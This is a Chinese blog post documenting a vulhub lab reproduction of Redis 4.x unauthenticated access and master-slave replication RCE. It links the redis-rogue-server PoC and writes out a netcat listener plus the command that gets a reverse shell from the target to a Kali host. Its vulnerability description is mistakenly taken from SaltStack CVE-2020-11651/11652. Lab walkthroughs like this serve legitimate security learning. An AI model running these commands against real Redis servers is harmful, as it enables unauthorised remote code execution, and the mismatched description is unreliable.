Redis 4.x5.x 未授权访问漏洞(Redis基于主从复制的RCE)

最新推荐文章于 2024-05-28 15:44:55 发布
最新推荐文章于 2024-05-28 15:44:55 发布
阅读量1.8k 收藏 3
点赞数 1
分类专栏: 中间件漏洞复现 文章标签: redis 安全漏洞 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/110719321
版权

声明

好好学习,天天向上

漏洞描述

SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。

在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。

影响范围

  • SaltStack < 2019.2.4
  • SaltStack < 3000.2

复现过程

使用vulhub

这里使用4.0.14版本

cd /app/vulhub-master/redis/4-unacc

启动

docker-compose up -d

环境启动后,直接执行telnet,不用登录,就可以访问redis

telnet 192.168.239.129 6379

在这里插入图片描述

下载POC

https://github.com/n0b0dyCN/redis-rogue-server

kali监听IP

nc -lvvp 9999

下载后,在kali上直接运行(rhost是目标IP也就是redis,lhost是原IP就是kali的反弹shellIP),这里执行不成功就多执行几次,别轻易放弃

./redis-rogue-server.py --rhost 192.168.239.129 --lhost 192.168.239.139

运行后提示让你输交互式还是反弹,我这里选反弹r

输入反弹IP和端口,直接输入IP就好

反弹shell,急着kali中先监听,比如我想让他往我的kali,192.168.239.139上的9999反弹

在这里插入图片描述

拿下

在这里插入图片描述

使用完关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis系列漏洞总结
NLost
10-21 6254
授权访问;redis写入webshell;redis写入ssh公钥登录;写入计划任务反弹shell;主从复制rce;什么是主从复制;ssrf+redis写入webshell;Redis Lua 沙盒绕过rce
【vulhub漏洞复现】redis 4-unacc 授权访问漏洞
RexHa的博客
03-03 4611
一、漏洞详情Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。
Redis漏洞总结
最新发布
白帽子佳奇的博客
05-28 881
redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同方式的排序。与memcached一样,为了保证效率,数据都是缓存在内存中。
Saltstack CVE-2020-11651CVE-2020-11652复现
thelostworld
05-12 348
一、漏洞描述SaltStack是基于Python开发的一套C/S架构配置管理工具,是一个服务器基础架构集中化管理平台,具备配置管理、远程执行、监控等功能,基于Python语言实现,结合轻量级消息队列(ZeroMQ)与Python第三方模块(Pyzmq、PyCrypto、Pyjinjia2、python-msgpack和PyYAML等)构建。在CVE-2020-11651认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过Salt Master的验证逻辑,调用相关授权函数功能,从而可以造成远程命令执行漏洞。在C
redis-rce:Redis RCE 的几种方法
04-15
redis-rce Redis RCE 的几种方法 文章请参考
Redis主从漏洞和远程连接漏洞
LeeZbug的博客
02-16 3719
主从复制漏洞: 参考文章:Redis主从复制getshell技巧 - Bypass - 博客园 1.so和rce文件下载:GitHub - LeeZBug/redis-rce: Redis 4.x/5.x RCE 下载后安装所需要的python库,pip install -r requirement.txt 2.运行rce python redis-rce.py -r [target_ip] -L [attack_ip] -a [redis_require_password] -f module
redis漏洞利用总结
good good study
10-17 6431
redis属于非关系型数据库,在开启后默认监听端口为6379。若Redis配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,存在授权访问,弱口令或者口令泄露等主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave);数据的复制是单向的,只能由主节点到从节点。Redis的持久化使得机器即使重启数据也不会丢失,因为redis服务器重启后会把硬盘上的文件重新恢复到内存中。
一文清晰带你认识redis漏洞
逍遥小哥的博客
02-01 1417
主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids 4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。数据持久化:Redis提供持久化功能,可以将数据保存到磁盘上,以防止数据丢失。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
CVE-2020-11651复现
weixin_44576411的博客
12-23 517
CVE-2020-11651(身份验证绕过漏洞) 简述 漏洞原因: SaltStack是python的架构开发工具 但是它的ClearFuncs类会处理非认证的请求和暴露_send_pub()方法,而且还会暴露_prep_auth_info()方法。 漏洞使用方法 攻击者可以通过构造恶意请求,绕过salt master 的验证逻辑,调用相关的授权功能,从而造成远程命令执行漏洞。 ClearFuncs类处理经身份验证的请求,并且无意中公开了_send_pub()方法,该方法可用于直接在master服务器上
Redis3.x和Redis4.x的Windows版.zip
06-16
在Windows环境下安装Redis,通常需要下载预编译的二进制文件,解压后配置`redis.conf`文件,根据需求设置端口、日志级别、持久化方式等参数。启动服务可以使用`redis-server.exe`命令。同时,Windows版Redis提供了`...
redis6.x视频教程下载
08-01
Redis 6.x 是一个高性能、开源的键值存储系统,被广泛用于数据库、缓存和消息中间件等场景。这个视频教程将深入介绍 Redis 6.x 的新特性、核心概念以及实际应用。以下是对 Redis 6.x 的一些关键知识点的详细讲解: ...
Redis 7.0.4 x64位 windows 系统 安装包 Redis7.0.4.zip
09-07
二、修改Redis永久密码,打开redis.conf文件,查找requirepass,修改requirepass空格后面的默认密码20220906 亲自用redis-7.0.4.tar.gz打包成的windows 64位系统安装包,测试可用,详细使用参考Readme.txt说明文件
LAMP架构+Redis主从复制.docx
10-08
LAMP架构+Redis主从复制 本文档主要介绍了LAMP架构的安装和配置,以及Redis主从复制的设置。LAMP架构是指Linux操作系统、Apache HTTP服务器、MySQL数据库和PHP编程语言的组合,而Redis则是一个开源的、基于内存的...
redis主从复制
weixin_63231007的博客
02-28 1698
redis主从复制原理以及简单演示(环境真难搭)
Redis-主从复制(一)
全力奔跑,梦在彼岸
09-02 338
什么是主从复制? &nbsp;&nbsp;&nbsp;&nbsp;将一台redis服务器的数据,复制到其他的redis服务器,前者称为主节点,后者称为从节点,数据的复制是单向的,只能由主节点复制到从节点。 &nbsp;&nbsp;&nbsp;&nbsp;默认情况下,每台redis服务器都是主节点,一个主节点可以有多个从节点(或者没有),但一个从节点只能有一个主节点。 主从复制的作用? &n...
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 1612
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
渗透测试之地基服务篇:服务攻防之数据库Redis(下)
liuhyusb的博客
08-31 81
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
redis主从复制漏洞 redis主从复制命令
lxw1844912514的博客
04-10 79
1、主从复制1.1、主从复制是什么行话:也就是我们所说的主从复制,主机数据更新后根据配置和策略, 自动同步到备机的master/slaver机制,Master以写为主,Slave以读为主1.2、主从复制能干嘛•读写分离•容灾恢复1.3、主从复制怎么玩准备工作•配从(库)不配主(库)从库配置命令:slaveof 主库IP 主库端口每次与master断开之后,都需要重新连接,除非你配置进redi...
redis3.x和redis 6.x版本区别
07-28
Redis 3.x 和 Redis 6.x 是 Redis 数据库的不同版本,它们之间有一些重要的区别。以下是其中一些主要区别: 1. 多线程支持:Redis 3.x 是单线程的,在处理请求时只能使用一个 CPU 核心。而 Redis 6.x 引入了多线程支持,可以利用多个 CPU 核心进行并行处理,从而提高了性能。 2. 内存分配器:Redis 3.x 使用了 jemalloc 作为默认的内存分配器,而 Redis 6.x 则改为使用了更现代化的 TCMalloc。 3. RDB 文件格式:Redis 3.x 使用 RDB 文件格式来进行持久化,而 Redis 6.x 引入了新的 RDB 文件格式,该格式支持更多的数据类型和功能。 4. 模块化:Redis 6.x 引入了模块化的架构,允许开发者通过编写插件来扩展 Redis 的功能。这使得开发者可以更方便地定制和增强 Redis 的行为。 5. ACL(访问控制列表):Redis 6.x 引入了更强大的 ACL 功能,允许管理员对 Redis 进行更细粒度的权限控制和用户管理。 6. 复制和集群:Redis 6.x 对复制和集群的支持进行了改进,提供了更高的可靠性和容错性。 这些是 Redis 3.x 和 Redis 6.x 之间的一些重要区别,但还有其他一些细微的变化和改进。根据您的具体需求和使用场景,选择适合的版本是很重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值